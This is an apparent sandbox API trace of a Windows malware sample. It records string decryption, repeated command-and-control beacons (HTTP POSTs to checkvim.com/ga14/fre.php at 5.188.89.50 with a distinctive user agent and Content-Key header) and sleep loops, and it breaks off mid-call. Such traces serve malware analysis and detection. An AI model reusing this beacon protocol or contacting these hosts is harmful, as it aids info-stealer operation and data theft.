LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.511] CryptImportKey (in: hProv=0x86f710, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0256.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.513] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0256.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.514] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.514] GetProcessHeap () returned 0x840000 [0256.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0256.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.515] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0256.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.516] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0256.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.517] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0256.517] GetProcessHeap () returned 0x840000 [0256.517] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0256.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.518] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.519] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.520] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.521] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.521] GetProcessHeap () returned 0x840000 [0256.521] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0256.522] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0256.522] GetProcessHeap () returned 0x840000 [0256.522] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0256.522] GetProcessHeap () returned 0x840000 [0256.522] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0256.522] GetProcessHeap () returned 0x840000 [0256.522] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0256.522] GetProcessHeap () returned 0x840000 [0256.522] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0256.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.523] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0256.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.532] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0256.544] GetProcessHeap () returned 0x840000 [0256.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0256.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.545] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0256.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.546] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0256.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.548] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.548] GetProcessHeap () returned 0x840000 [0256.548] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0256.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.549] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0256.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.550] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0256.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0256.552] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0256.552] GetProcessHeap () returned 0x840000 [0256.552] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0256.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.553] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0256.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.554] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0256.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0256.555] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0256.555] GetProcessHeap () returned 0x840000 [0256.555] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0256.555] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0256.559] GetProcessHeap () returned 0x840000 [0256.559] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b88 [0256.559] socket (af=2, type=1, protocol=6) returned 0x3a8 [0256.560] connect (s=0x3a8, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0256.638] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0256.638] GetProcessHeap () returned 0x840000 [0256.638] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0256.638] GetProcessHeap () returned 0x840000 [0256.638] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0256.639] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0256.640] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0256.640] GetProcessHeap () returned 0x840000 [0256.640] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0256.640] GetProcessHeap () returned 0x840000 [0256.640] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0256.640] GetProcessHeap () returned 0x840000 [0256.640] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0256.640] GetProcessHeap () returned 0x840000 [0256.640] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0256.641] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0256.642] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0256.642] GetProcessHeap () returned 0x840000 [0256.642] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0256.642] GetProcessHeap () returned 0x840000 [0256.642] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0256.642] send (s=0x3a8, buf=0x873a58*, len=237, flags=0) returned 237 [0256.643] send (s=0x3a8, buf=0x87eb58*, len=159, flags=0) returned 159 [0256.643] GetProcessHeap () returned 0x840000 [0256.643] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0256.643] recv (in: s=0x3a8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0257.007] GetProcessHeap () returned 0x840000 [0257.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0257.007] GetProcessHeap () returned 0x840000 [0257.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0257.007] GetProcessHeap () returned 0x840000 [0257.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0257.007] GetProcessHeap () returned 0x840000 [0257.007] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0257.007] closesocket (s=0x3a8) returned 0 [0257.008] GetProcessHeap () returned 0x840000 [0257.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b88 | out: hHeap=0x840000) returned 1 [0257.008] GetProcessHeap () returned 0x840000 [0257.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0257.008] GetProcessHeap () returned 0x840000 [0257.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0257.009] GetProcessHeap () returned 0x840000 [0257.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0257.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1298) returned 0x3a8 [0257.018] Sleep (dwMilliseconds=0xea60) [0257.072] GetProcessHeap () returned 0x840000 [0257.072] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0257.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.073] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0257.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.079] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0257.087] GetProcessHeap () returned 0x840000 [0257.087] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0257.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.088] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0257.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.089] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0257.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.091] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.091] GetProcessHeap () returned 0x840000 [0257.091] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0257.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.092] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0257.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.097] CryptDestroyKey (hKey=0x87e330) returned 1 [0257.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.098] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0257.098] GetProcessHeap () returned 0x840000 [0257.098] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0257.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.100] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.100] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.101] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.107] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.107] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.108] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.108] GetProcessHeap () returned 0x840000 [0257.108] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0257.108] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0257.109] GetProcessHeap () returned 0x840000 [0257.109] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0257.109] GetProcessHeap () returned 0x840000 [0257.109] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0257.109] GetProcessHeap () returned 0x840000 [0257.109] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0257.109] GetProcessHeap () returned 0x840000 [0257.109] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f8c0 [0257.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.110] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0257.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.115] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0257.121] GetProcessHeap () returned 0x840000 [0257.121] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0257.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.122] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0257.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.123] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0257.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.124] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.124] GetProcessHeap () returned 0x840000 [0257.124] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0257.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.125] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f8c0, pdwDataLen=0x19f9a4 | out: pbData=0x87f8c0, pdwDataLen=0x19f9a4) returned 1 [0257.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.126] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0257.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0257.127] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0257.127] GetProcessHeap () returned 0x840000 [0257.127] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0257.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.128] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0257.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.129] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0257.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0257.130] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0257.130] GetProcessHeap () returned 0x840000 [0257.130] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0257.130] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0257.132] GetProcessHeap () returned 0x840000 [0257.132] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bf8 [0257.132] socket (af=2, type=1, protocol=6) returned 0x3ac [0257.132] connect (s=0x3ac, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0258.284] FreeAddrInfoW (pAddrInfo=0x8714e8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0258.288] GetProcessHeap () returned 0x840000 [0258.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0258.288] GetProcessHeap () returned 0x840000 [0258.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0258.289] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0258.290] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0258.290] GetProcessHeap () returned 0x840000 [0258.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0258.290] GetProcessHeap () returned 0x840000 [0258.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0258.290] GetProcessHeap () returned 0x840000 [0258.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0258.290] GetProcessHeap () returned 0x840000 [0258.290] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0258.291] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0258.291] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0258.291] GetProcessHeap () returned 0x840000 [0258.291] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0258.292] GetProcessHeap () returned 0x840000 [0258.292] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0258.292] send (s=0x3ac, buf=0x873a58*, len=237, flags=0) returned 237 [0258.293] send (s=0x3ac, buf=0x87eb58*, len=159, flags=0) returned 159 [0258.293] GetProcessHeap () returned 0x840000 [0258.293] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0258.293] recv (in: s=0x3ac, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0258.631] GetProcessHeap () returned 0x840000 [0258.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0258.631] GetProcessHeap () returned 0x840000 [0258.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0258.631] GetProcessHeap () returned 0x840000 [0258.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0258.631] GetProcessHeap () returned 0x840000 [0258.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0258.632] closesocket (s=0x3ac) returned 0 [0258.633] GetProcessHeap () returned 0x840000 [0258.633] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bf8 | out: hHeap=0x840000) returned 1 [0258.634] GetProcessHeap () returned 0x840000 [0258.634] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0258.634] GetProcessHeap () returned 0x840000 [0258.634] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0258.634] GetProcessHeap () returned 0x840000 [0258.634] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0258.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1138) returned 0x3ac [0258.668] Sleep (dwMilliseconds=0xea60) [0258.673] GetProcessHeap () returned 0x840000 [0258.673] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0258.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.674] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0258.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.736] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0258.768] GetProcessHeap () returned 0x840000 [0258.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0258.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.769] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0258.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.770] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0258.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.772] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.772] GetProcessHeap () returned 0x840000 [0258.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0258.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.774] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0258.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.775] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0258.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0258.776] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0258.776] GetProcessHeap () returned 0x840000 [0258.777] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0258.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0258.778] StrStrA 